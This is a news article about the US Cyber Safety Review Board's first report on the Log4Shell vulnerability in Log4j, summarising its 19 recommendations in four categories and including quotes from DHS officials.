The US Department of Homeland Security has released the Cyber Safety Review Board’s (CSRB) report into Log4j vulnerabilities, which details actionable recommendations for government and industry.
The CSRB is a new public-private initiative within CISA that aims to bring together government and industry leaders to review and assess significant cyber security events and threats.
The board’s first report addresses the “continued risk” posed by the Log4Shell vulnerability in the widely used Log4j open-source software library, discovered in late 2021. It is one of the most prominent cyber security threats of recent years.
Described as “one of the most serious vulnerabilities discovered in recent years”, the CSRB’s recommendations focus on driving better security in software products, as well as enhancing organizations’ response abilities.
“The CSRB’s first-of-its-kind review has provided us – government and industry alike – with clear, actionable recommendations that DHS will help implement to strengthen our cyber resilience and advance the public-private partnership that is so vital to our collective security,” commented Secretary of Homeland Security Alejandro Mayorkas, who delivered the report to President Biden.
Grabbling with the Log4Shell vulnerability
First disclosed on 9 December 2021, Log4Shell is a zero-day remote code execution vulnerability in Java logger Log4j, which was awarded a 10/10 criticality rating by CISA.
In a nutshell, the flaw enables attackers to submit a specially crafted request to a vulnerable system, causing it to execute arbitrary code. As a result, the attackers can take full control of the affected system from a remote location.
The vulnerability was found to have been exploited by coin miners, remote access trojans (RATs), botnets, ransomware, and advanced persistent threats (APTs)
According to CISA, cyber threat actors have continued to exploit the vulnerability in VMware Horizon and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds.
Log4Shell: Recommendations and best practice
The CSRB engaged with nearly 80 organizations and key individuals to gather insights into the Log4j event and develop actionable recommendations for future incidents.
The 19 recommendations outlined in the report have been split into four categories; the first focuses on addressing the continued risks and states that both organizations and government bodies should be prepared to apply vigilance to Log4j vulnerabilities “for the long term”.
The second outlines recommendations for driving best practices for security hygiene, advising adoption of industry-accepted best practices and standards for vulnerability management. That includes investment in security capabilities and development of response programs and practices.
The third category advises organizations on building a better software ecosystem to move to a proactive model of vulnerability management, including increasing investments in open source software security, as well as training software developers in secure software development.
Lastly, the fourth group notes that investing in new systems and groups for the future will be essential in securing the US’ infrastructure and digital resilience in the long term.
“Never before have industry and government cyber leaders come together in this way to review serious incidents, identify what happened, and advise the entire community on how we can do better in the future,” said Robert Silvers, CSRB Chair and DHS Under Secretary for Policy.
“Our review of Log4j produced recommendations that we are confident can drive change and improve cyber security.”
